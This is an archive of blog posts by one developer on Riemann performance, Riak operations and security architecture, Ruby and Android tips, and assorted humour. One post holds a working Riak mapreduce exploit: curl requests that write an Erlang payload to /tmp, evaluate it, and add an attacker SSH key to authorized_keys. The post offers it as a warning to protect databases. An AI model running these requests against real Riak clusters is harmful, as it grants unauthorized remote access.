I've been focusing on Riemann client libraries and optimizations recently, both at Boundary and on my own time.

Boundary uses the JVM extensively, and takes advantage of Coda Hale's Metrics. For our applications I've written a Riemann Java UDP and TCP client, which also includes a Metrics reporter. The Metrics reporter (I'll be submitting that to metrics-contrib later) will just send periodic events for each of the metrics in a registry, and optionally some VM statistics as well. It can prefix each service, filter with predicates, and has been reporting for two of our production systems for about a week now.

The Java client has been integrated into Riemann itself, replacing the old Aleph client. It's about on par with the old Aleph client, owing to its use of standard Socket and friends as opposed to Netty. MÃ¥rten Gustafson and Edward Ribeiro have been instrumental in getting the Java client up and running, so my sincere thanks go out to both of them.

I also removed the last traces of Aleph from riemann.server, replacing the TCP server with a pure Netty implementation. I also replaced Gloss with Netty-provided length header parsers, which cuts down on copying somewhat. Here's the performance of a single-threaded localhost client which sends an event and receives a OK response:

Aleph Raw Netty
drop tcp events latency.png drop tcp events latency 2.png
drop tcp events throughput.png drop tcp events throughput 2.png

Steady-state throughput with raw Netty is about 2.5 times faster. Median and 95% latency is significantly decreased, though occasional 20ms spikes are still present (I presume due to GC). Please keep in mind these graphs can only be compared with each other; they depend significantly on the hardware and JVM. This also does not represent concurrent performance&emdash;I'm trying to optimize the simplest system first before moving up. With that in mind, Riemann's real-world performance with these changes should be “much faster”.

Next up I'll be replacing clojure-protobuf with direct use of the Java protobuf classes; as I'm copying data into a standard Map anyway it should be slightly faster and consolidate codepaths between server and client. I'll also begin type-hinting key sections of the server and message parser to reduce use of reflection.

The initial stable release of Riemann 0.1.0 is available for download. This is the culmination of the 0.0.3 development path and 2 months of production use at Showyou.

Is it production ready? I think so. The fundamental stream operators are in place. A comprehensive test suite checks out. Riemann has never crashed. Its performance characteristics should be suitable for a broad range of scales and applications.

There is a possible memory leak, on the order of 1% per day in our production setup. I can't replicate it under a variety of stress tests. It's not clear to me whether this is legitimate state information (i.e. an increase in tracked data), GC/malloc implementations being greedy, or an actual memory leak. Profiling and understanding this is my top priority for Riemann. If this happens to you, restarting the daemon every few weeks should not be prohibitive; it takes about five seconds to reload. Should you encounter this issue, please drop me a line with your configuration; it may help me identify the cause.

The Riemann talk tonight at Boundary is sold out, but I may deliver another in the next month or so. Thanks for your interest, suggestions, and patches. I hope you enjoy Riemann. :)

When I designed UState, I had a goal of a thousand state transitions per second. I hit about six hundred on my Macbook Pro, and skirted 1000/s on real hardware. Eventmachine is good, but I started to bump up against concurrency limits in MRI's interpreter lock, my ability to generate and exchange SQL with SQLite, and protobuf parse times. So I set out to write a faster server. I chose Clojure for its expressiveness and powerful model of concurrent state–and more importantly, the JVM, which gets me Netty, a mature virtual machine with a decent thread model, and a wealth of fast libraries for parsing, state, and statistics. That project is called Riemann.

Today, I'm pleased to announce that Riemann crossed the 10,000 event/second mark in production. In fact it's skirting 11k in my stress tests. (That final drop in throughput is an artifact of the graph system showing partially-complete data.)

throughput.png

cpu.png

By the way, we push about 200 events/sec through a single Riemann server from all of Showyou's infrastructure. There's a lot of headroom.

I did the dumbest, easiest things possible. No profiling. A heavy abstraction (aleph) on top of netty. I haven't even turned on warn-on-reflection or provided type hints yet. All operations are over synchronous TCP. This benchmark measures Riemann's ability to thread events through a complex set of streams including dozens of (where) filters and updating the index with every received event.

10k.png

I'm in the final stages of packaging Riemann for initial public release this week. Boundary has also kindly volunteered their space for a tech talk on Riemann: Thursday, March 1st, at Boundary's offices, likely at 7 PM. I'll post a Meetup link here and on Twitter shortly.

Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 6, and Server 2008 versions.

...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

Meanwhile, in an aging supervillain's cavernous lair...

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \ http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF Riak is like the Beatles: listening has side effects. EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"] ], "query": [ {"map": { "language": "javascript", "source": " function(v) { // "/tmp/evil.erl" return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "write_file", "arg": " SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n SSH = SSHDir ++ \"authorized_keys\".\n filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n file:change_mode(SSHDir, 8#700).\n file:change_mode(SSH, 8#600).\n file:delete(\"/tmp/evil.erl\"). " }} ] } EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"]], "query": [ {"map": { "language": "javascript", "source": " function(v) { return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "path_eval", "arg": "/tmp/evil.erl", }} ] }

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

As a part of the exciting series of events (long story...) around our riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.

mapred.png

[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like

map_reduce_error

with no explanation in the logs, or

{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}

when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the proscribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. Oauth providers (like Facebook and Twitter), or OpenID also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and have less ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employee's salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usenames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Lets sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.

Naturally, this only works for certain operations. Mapreduce, for instance, excecutes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

One of the hard-won lessons of the last few weeks has been that inexplicable periodic latency jumps in network services should be met with an investigation into named.

dns_latency.png

API latency has been wonky the last couple weeks; for a few hours it will rise to roughly 5 to 10x normal, then drop again. Nothing in syslog, no connection table issues, ip stats didn't reveal any TCP/IP layer difficulties, network was solid, no CPU, memory, or disk contention, no obviously correlated load on other hosts. Turns out it was Bind getting overwhelmed (we have, er, nontrivial DNS demands) and causing local domain resolution to slow down. For now I'm just pushing everything out in /etc/hosts, but will probably drop a local bind9 on every host as a cache.

If anyone has experience with production DNS resolver caching, would appreciate your input.

John Mullerleile, Phil Kulak, and I gave a talk tonight, entitled "Scaling at Showyou."

stack.png

I gave an overview of the Showyou architecture, including our use of Riak, Solr, and Redis; strategies for robust systems; and our comprehensive monitoring system. You may want to check out:

Phil talked a little bit about the importer, including our use of Node.js and some nice stats.

John dropped lots of juicy details regarding his exciting projects, including a new Riak backend which binds together Solr, LevelDB, and a distributed processing system we're calling Fabric. Fast parallelized key listing, range queries, full-text search, geospatial queries, etc. In Riak. Yes, you heard that right.

Oh, and as a part of Fabric we've got a distributed queue with replicated failover and transactions, built on top of Hazelcast. Exposed over protocol buffers. We've got some polishing to do before that gets released, but when it does, should be worthy of another talk.

AWS::S3 is not threadsafe. Hell, it's not even reusable; most methods go through a class constant. To use it in threaded code, it's necessary to isolate S3 operations in memory. Fork to the rescue!

def s3(key, data, bucket, opts) begin fork_to do AWS::S3::Base.establish_connection!( :access_key_id => KEY, :secret_access_key => SECRET ) AWS::S3::S3Object.store key, data, bucket, opts end rescue Timeout::Error raise SubprocessTimedOut end end def fork_to(timeout = 4) r, w, pid = nil, nil, nil begin # Open pipe r, w = IO.pipe # Start subprocess pid = fork do # Child begin r.close val = begin Timeout.timeout(timeout) do # Run block yield end rescue Exception => e e end w.write Marshal.dump val w.close ensure # YOU SHALL NOT PASS # Skip at_exit handlers. exit! end end # Parent w.close Timeout.timeout(timeout) do # Read value from pipe begin val = Marshal.load r.read rescue ArgumentError => e # Marshal data too short # Subprocess likely exited without writing. raise Timeout::Error end # Return or raise value from subprocess. case val when Exception raise val else return val end end ensure if pid Process.kill "TERM", pid rescue nil Process.kill "KILL", pid rescue nil Process.waitpid pid rescue nil end r.close rescue nil w.close rescue nil end end

There's a lot of bookkeeping here. In a nutshell we're forking and running a given block in a forked subprocess. The result of that operation is returned to the parent by a pipe. The rest is just timeouts and process accounting. Subprocesses have a tendency to get tied up, leaving dangling pipes or zombies floating around. I know there are weak points and race conditions here, but with robust retry code this approach is suitable for production.

Using this approach, I can typically keep ~8 S3 uploads running concurrently (on a fairly busy 6-core HT Nehalem) and obtain ~sixfold throughput compared to locking S3 operations with a mutex.

In distributed systems, one frequently needs a set of n nodes to come to a consensus on a particular coordinating or master node, referred to as the leader. Leader election protocols are used to establish this. Sure, you could do the Swedish or the Silverback, but there's a whole world of consensus algorithms out there. For instance:

The Agent Smith

Each node injects its neighbors with a total copy of its own state and identity, taking over operations on that node. Convergence is reached when all nodes are identical.

The Highlander Ending

This trivial algorithm simply ensures that all nodes crash upon receiving any decapitate message from a neighbor k. That node's responsibilities and powers are delegated to k. The last node standing wins.

The Deathly Hallows

Each node i contacts zero to n-1 other nodes, and stores upon each a prime number known as a hoarcrux. The product of all hoarcruxen is the Avada Kedavra for node i; when i receives it in a message, it immediately exits the leader election process. Each node proceeds to contact its neighbors in search of hoarcruxes, and attempts to use them to win the election. If a node is terminated while its killing curse is "in flight", the curse is negated and both nodes seek new targets.

The Terminator II

This leader election protocol can only be implemented on computational substrates embedded in closed timelike curves. This system has the happy property of never encountering a conflict. If two nodes ever conflict, each dispatches a function to before the origin of the system, killing its competitor before it enters the cluster. Logical coherency then requires the system proceeds without ever encountering a failure.

Note: attempts to implement this process have resulted in the untimely and grisly redacted redacted redacted of no fewer than -0 programmers, due to we regret to inform you that this message is inappropriate for younger viewers.

The Cthulu Fhtagn

A small subset of nodes are classified as the Old Ones and enter sleep. All other nodes are considered cultists and send messages to a randomly selected Old One. When a sufficient (randomly determined) number of prayers have been received by an Old One (or whenever it feels like), it awakens and is considered the leader. All cultists immediately dump core.

Note: Astute readers may have noticed this protocol does not guarantee a leader exists, or for that matter, that there is at maximum only one leader. Embrace chaos.

Note: CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN

Note: A variant of this algorithm is used in several popular distributed databases.

The Folsom State Fair

Each node is designated, by PRNG, a "top" or "bottom" role, and begins in state virgin. Each bottom b advertises its availability to its neighbors; when it encounters a top t, b changes state to claimed and considers itself the property of t. When all bottoms have given up their virginity, the leader is the top with the most claimed nodes. Ties are resolved by selecting the remaining tops and recursively evaluating the protocol, only this time every node issues a log message that it's really just versatile.

The Congressional Election

Nodes assign themselves to one of two parties, A or B, by random value. A quorum agreement between nodes is required to elect a leader. Voting for a leader proceeds in synchronized rounds, typically lasting multiple days.

When a vote arises, each node issues a broadcast message informing the cluster of its vote. A nodes always vote for the A node with the highest process identifier. B nodes always vote for the B node with the highest process identifier.

If at any point more than 60% of the messages received by a given node are for the opposite party, that node initiates a filibuster. It spams the network with a hold message, during which no other nodes can proceed with the election process.

This protocol proceeds until the cluster has almost exhausted virtual memory, at which point a quarter of the processes (with the exception of the distributed system itself) on each host are terminated, and the election process restarts.

If you ever need to unzip data compressed with zlib without a header (e.g. produced by Erlang's zlib:zip), it pays to be aware that

windowBits can also be -8..-15 for raw inflate. In this case, -windowBits determines the window size. inflate() will then process raw deflate data, not looking for a zlib or gzip header, not generating a check value, and not looking for any check values for comparison at the end of the stream. (zlib.h)

Hence, you can do something like

zs = Zlib::Inflate.new(-15) unzipped = zs.inflate(string) zs.finish zs.close
23:09 < justin> Erlang tattoo might be cool
23:09 < justin> not many have those
23:10 < justin> not even sure what that would look like
23:10 < aphyr_> Yeah, really gonna add to my aura of mysterious sexiness
23:10 < aphyr_> "What's that?"
23:10 < aphyr_> "Oh, that's Erlang. It's a distributed functional programming language."
23:10 < justin> Mad tail
23:10 < aphyr_> "Tell me, would you and your friends like to do it... concurrently?"
23:13 < aphyr_> "Oh sorry. You're not my... TYPE."
23:13 < aphyr_> DAMN YOOOOUUU STATIC COMPILERS!

Things are getting a little slap-happy here in the final hours before Showyou launch.

I just built a Chrome extension for Vodpod.com. It builds off of the high-performance API I wrote last year, and offers some pretty sweet unread-message synchronization. You'll get desktop notifications when someone you know collects a video, in addition to a miniature version of your feed.

As it turns out, Chrome is really great to develop for. Everything just works, and it works pretty much like the standard says it should. Local storage, JSON, inter-view communication, notifications... all dead simple. Props to the Chrome/Chromium teams!

Here's the quickest way I know to get Eclipse up and running with the Android SDK plugin. To install each of these packages, go to Help->Install New Software, add the given URI as a package source, and install the given package. Eclipse may prompt you to restart after some installs.

Source Package
http://download.eclipse.org/tools/gef/updates/releases/GEF SDK
http://download.eclipse.org/modeling/emf/updates/releases/EMF SDK 2.5.0 (EMF + XSD)
http://download.eclipse.org/webtools/updatesWeb Tools Platform / Eclipse XML Editors and Tools
https://dl-ssl.google.com/android/eclipse/Developer Tools

That should do it for you!

$ adb devices List of devices attached ???????????? no permissions

A few things have changed since the Android docs were written. If you want to talk to your Motorola Droid via ADB in Ubuntu 9.10 Karmic, I recommend the following udev rule.

# /etc/udev/rules.d/99-android.rules SUBSYSTEM=="usb", ATTRS{idVendor}=="22b8", SYMLINK+="android_adb", MODE="0666" GROUP="plugdev"

Restart udev, unplug and re-plug the device, and it should show up! Make sure USB debugging is enabled on your droid.

$ sudo restart udev $ adb devices List of devices attached 0403681F17009017 device

If that doesn't work, try restarting the adb server:

$ adb kill-server $ nohup adb start-server

Yamr Yamr

Sometime in the last couple of weeks, the Yammer AIR client stopped fetching new messages. I've grown to really like the service, especially since it delivers a running stream of commits to the Git repos I'm interested in, so I broke down and wrote my own client.

Yamr is a little ruby/gtk app built on top of jstewart's yammer4r and the awesome danlucraft's Ruby Webkit-GTK+ bindings. No seriously, Dan, you rock.

Features

  • Reads messages
  • Posts messages
  • OAUTH support
  • Notifies you using libnotify, instead of that awful AIR thing.

Anyway, feel free to fork & hack away. You should be able to build ruby-webkit without much trouble on ubuntu; I've included directions in the readme. It's super-basic right now, but most of the core functionality is ready to start adding features. Enjoy!

All right boys and girls, I'm all for quality releases and everything, but Cortex Reaver 0.2.0 is raring to go. Just gem upgrade to get some awesome blogging goodness.

I threw together a little jQuery tag editor last weekend for Cortex Reaver, since hours of google searching turned up, well, not much. Feel free to try the demo and use it for your projects.

A bit of context, in case you haven't been keeping up with the real-time web craze:

RSSCloud is an... idea* for getting updates on RSS feeds to clients faster, while decreasing network load. In traditional RSS models, subscribers make an HTTP request every 10 minutes or so to a publisher to check for updates. In RSSCloud, a cloud server aggregates several feeds from authors. When feeds are changed, their authors send an HTTP request to the cloud server notifying them of the update. The cloud server contacts one or more subscribers of the feed, sending them a notice that the feed has changed. The subscribers then request the feed from the authors. Everyone gets their updates faster, and with fewer requests across the network.

The Problem

When you subscribe to an RSSCloud server, you tell it several things about how to notify you of changes:

  1. A SOAP/XML-RPC notify procedure (required but useless for REST)
  2. What port to call back on.
  3. What path to make the request to.
  4. The protocol you accept (XML-RPC, SOAP, or HTTP POST).
  5. The URLs of the feeds to subscribe to.

There's something missing! The RSSCloud walkthrough says:

Notifications are sent to the IP address the request came from. You can not request notification on behalf of another server.

That's great unless your originating IP address can't receive HTTP traffic. That rules out users behind a NAT or behind a firewall (without forwarded ports). That's most home users with routers, users on typical corporate networks, etc. It won't work on the iPhone. And, to a lesser degree, it rules out the cloud itself.

One of the common aspects of cloud computing is that compute nodes (and their IP addresses) may come and go as needed. For example, Vodpod.com is served by several different servers which (through a combination of heartbeat-failover, IP routing, and HTTP proxying) may enter and leave the cluster at any time without service interruption. So, if one of those servers subscribes to a feed, it might not be online to receive pings later. You'd have to subscribe to each feed from every host to guarantee that you'd continue to receive responses. The problem only becomes worse when you start looking at cloud services like EC2.

The RSSCloud mailing list has been tossing around the obvious solution for several weeks now: just include a "domain" parameter which says what FQDN or IP address to connect to. On Friday, Dave Winer included it in his walkthrough. Even so, most of the cloud servers (Wordpress, for example) out there don't support it yet.

A Partial Solution

What can you do to get around this?

One solution is to use PubSubHubbub, which uses a full callback URL. Additionally, Superfeedr will even use RSSCloud to offer real-time updates through PuSH, effectively bridging the two schemes.

Alternatively, you can lie (sort of) about your address. This is what we've done at Vodpod to get Wordpress to call us back correctly. When we subscribe, we actually re-bind the TCP socket to a publically accessible IP. That IP is guaranteed to go somewhere in the cluster which can accept the RSSCloud update ping. Here's a truly evil hack to do just that, by replacing Net::HTTP's TCP socket with our own.

res = Net::HTTP.new(uri.host, uri.port).start do |http| # Replace the socket with one that we bind to the interface we want to use. # The local IP address we'd like RSSCloud to call back. local_addr = Socket.pack_sockaddr_in 0, '208.101.30.10' # The RSSCloud server IP address remote_addr = Socket.pack_sockaddr_in uri.port, uri.host # Create a new socket s = Socket.new Socket::AF_INET, Socket::SOCK_STREAM, 0 # Bind it to the local address s.bind local_addr # Wrap for Net::HTTP and connect socket = Net::BufferedIO.new(s) s.connect remote_addr # Replace the HTTP client's connection http.instance_variable_set('@socket', socket) # And make the request http.request(req) end

*Dave says it's not a standard, or a spec. As far as I can tell, RSSCloud consists of a mailing list, a walkthrough of how implementations can handle the pings/cloud tag in RSS feeds, and a bunch of loosely federated implementations with varying degrees of compatibility. Some speak XML-RPC, some speak SOAP, some speak plain-old REST, etc...

Reading the PHP documentation has convinced me (again) of what a mind-bogglingly broken language this is. Quickly, see if you can predict this behavior:

<?php echo "This is the integer literal octal 010: " . 010 . "\n\n"; $things = array( "The 0th element", "The 1st element", "The 2nd element", "The 3rd element", "The 4th element", "The 5th element", "The 6th element", "The 7th element", "The 8th element", "8" => "The element indexed by '8'", "foo" => "The element indexed by 'foo'", "010" => "The element indexed by '010'" ); // The string index "8" clobbered the integer index 8. // But the string index "010" didn't... echo "Now check out what PHP thinks the array is..."; print_r ($things); echo "\n\n"; // As expected echo "\$things[0]: $things[0]\n"; echo "\$things[1]: $things[1]\n"; // Okay, so strings are interpreted as integers sometimes... echo "\$things[\"0\"]: " . $things["0"] . "\n"; // Ah, now things become strange. This integer key gets the string "8" instead. echo "\$things[8]: $things[8]\n"; // This should refer to the 8th element, but it gets converted to an integer by // the preprocessor, then to a string, where it matches the clobbered 8th // element... echo "\$things[010]: " . $things[010] . "\n"; // This string key returns the expected "8" element... echo "\$things[\"8\"]: " . $things["8"] . "\n"; // But this string octal key gets the "010" key as expected. Note that it // *doesn't* get the integer 8, as you might expect from $things["0"] echo "\$things[\"010\"]: " . $things["010"] . "\n"; echo "\n"; ?>

Here's the output (PHP 5.2.6-3ubuntu4.1):

This is the integer literal octal 010: 8 Now check out what PHP thinks the array is...Array ( [0] => The 0th element [1] => The 1st element [2] => The 2nd element [3] => The 3rd element [4] => The 4th element [5] => The 5th element [6] => The 6th element [7] => The 7th element [8] => The element indexed by '8' [foo] => The element indexed by 'foo' [010] => The element indexed by '010' ) $things[0]: The 0th element $things[1]: The 1st element $things["0"]: The 0th element $things[8]: The element indexed by '8' $things[010]: The element indexed by '8' $things["8"]: The element indexed by '8' $things["010"]: The element indexed by '010'

This is an excellent example of why grafting features onto your language piecemeal to satisfy users who can't be bothered to figure out whether they are working with strings or integers is a Bad Idea™.

I released version 0.1.3 of Construct today. It incorporates a few bugfixes for nested schemas, and should be fit for general use.

I got tired of writing configuration classes for everything I do, and packaged it all up in a tiny gem: Construct.

Highlights

OpenStruct-style access to key-value pairs.

config.offices = ['Sydney', 'Tacoma']

Nested structures are easy to handle.

config.fruits = {
  :banana => 'slightly radioactive',
  :apple => 'safe'
}
config.fruits.banana # => 'slightly radioactive'

Overridable, self-documenting schemas for default values.

config.define(:address, :default => '1 North College St')
config.address # => '1 North College St'
config.address = 'Urnud'
config.address # => 'Urnud'

Straightforward YAML saving and loading.

config.to_yaml; Construct.load(yaml)

Define whatever methods you like on your config.

class Config < Construct
  def fooo
    foo + 'o'
  end
end

It's available as a gem:

gem install construct

A few minutes ago, I realized my disk was paging when I ran Vim. Took a quick look at gkrellm, and yes, in fact, I was almost out of swap space, and physical memory was maxed out. The culprit was Firefox, as usual; firefox-bin was responsible for roughly a gigabyte of X pixmap memory.

So I spent some time digging, and realized that I'd had a window open to the Nagios status map for a few hours, which includes a 992 x 1021 pixel PNG. The page refreshes every minute or so. So I closed Firefox, brought up xrestop, opened the status map again, and watched. Sure enough, X pixmap usage for Firefox jumped up by about 2500K per refresh. In the last 10 minutes or so, that number has ballooned to roughly 50MB.

What gets me is that this is the same image being loaded again and again. It's not just the back-page cache--it looks like Firefox is keeping every image it loads in X memory, and it never goes away: closing the tab, closing the window, clearing the cache... it looks like nothing short of ending the process frees those pixmaps. :-(

I run Fluxbox as my primary window manager, and use gnome-settings-daemon to keep gnome apps happy and GTK-informed. Thus far, all has gone well. However, OpenOffice.org does something very funky to determine whether one is using KDE or GTK, finds neither on my system, and drops back to the horribly ugly interface of 1997.

I haven't figured out how to fix this yet, but running gnome-session sets up something which convinces OpenOffice to use the GTK theme. It doesn't appear to be an environment variable, because I can set my environment identically under gnome and fluxbox, with no difference in OO behavior. My guess is there's some sort of socket or temporary file set by gnome-session, but it's all a mystery and the source is obfuscated. If anyone knows of a way to force OpenOffice 2.0 to use GTK, I'd be interested to hear about it.

